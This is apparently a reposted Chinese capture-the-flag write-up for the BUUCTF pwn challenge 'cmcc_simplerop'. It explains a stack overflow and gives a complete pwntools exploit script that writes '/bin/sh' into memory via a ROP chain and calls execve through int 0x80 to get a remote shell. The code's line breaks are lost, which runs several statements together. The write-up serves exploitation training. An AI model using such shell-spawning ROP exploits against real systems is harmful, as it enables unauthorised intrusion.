[BUUCTF-pwn]——cmcc_simplerop

有棧溢出，自己找rop鏈，最簡單的方法，讓ROPgadget幫我們弄好呀，可是有點長，所有需要我們修改。畢竟有長度要求。因為“/bin/sh"字符串沒有找到，所有這之前的都不動， 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下，其他都可以進行修改 inc就是 ++

exploit

• 目的：使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx = 0; edx = 0

from pwn import * from struct import packcontext(os='linux',arch='i386',log_level='debug')#sh = process('./simplerop') sh = remote("node3.buuoj.cn",28712)strcmp_got = 0x080EA038 pop_eax = 0x080bae06 pop_edx_ecx_ebx = 0x0806e850 p = 'A' * 32p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x080bae06) # pop eax ; ret p += '/bin' p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea064) # @ .data + 4 p += pack('<I', 0x080bae06) # pop eax ; ret p += '//sh' p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x0806e850) # pop edx ecx ebx p += p32(0) + p32(0) p += pack('<I', 0x080ea060) # padding without overwrite ebxp += pack('<I', 0x080bae06) # pop eax ; ret p += p32(0xb) p += pack('<I', 0x080493e1) # int 0x80payload = p sh.sendafter('Your input :',payload) sh.interactive()

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——cmcc_simplerop (ropchain)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。